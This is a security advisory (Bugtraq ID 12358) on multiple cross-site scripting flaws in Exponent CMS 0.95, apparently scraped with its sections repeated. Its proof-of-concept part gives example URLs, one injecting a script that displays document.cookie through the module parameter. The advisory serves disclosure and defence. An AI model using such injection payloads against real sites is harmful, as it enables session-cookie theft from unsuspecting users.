Exponent CMS Multiple Cross-Site Scripting Vulnerabilities
BID:12358
Info
Exponent CMS Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 12358 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 25 2005 12:00AM |
| Updated: | Jan 25 2005 12:00AM |
| Credit: | Discovery is credited to y3dips <[email protected]>. |
| Vulnerable: |
Exponent Exponent 0.95 |
| Not Vulnerable: | |
Discussion
Exponent CMS Multiple Cross-Site Scripting Vulnerabilities
Exponent is reported prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user facilitating theft of cookie-based authentication credentials and other attacks.
Exponent 0.95 is reported prone to these issues. It is likely that previous versions are vulnerable as well.
Exponent is reported prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user facilitating theft of cookie-based authentication credentials and other attacks.
Exponent 0.95 is reported prone to these issues. It is likely that previous versions are vulnerable as well.
Exploit / POC
Exponent CMS Multiple Cross-Site Scripting Vulnerabilities
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/endon/mod.php?action=[BLABLA]&module=[XSS]
http://www.example.com/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/expo/index.php?action=view&id=2&module=<h1>Tes</h1>
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/endon/mod.php?action=[BLABLA]&module=[XSS]
http://www.example.com/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/expo/index.php?action=view&id=2&module=<h1>Tes</h1>
Solution / Fix
Exponent CMS Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Exponent CMS Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- Exponent Home Page (Exponent)
- Vulnerabilities in eXponent 0.95 (Ahmad Muammar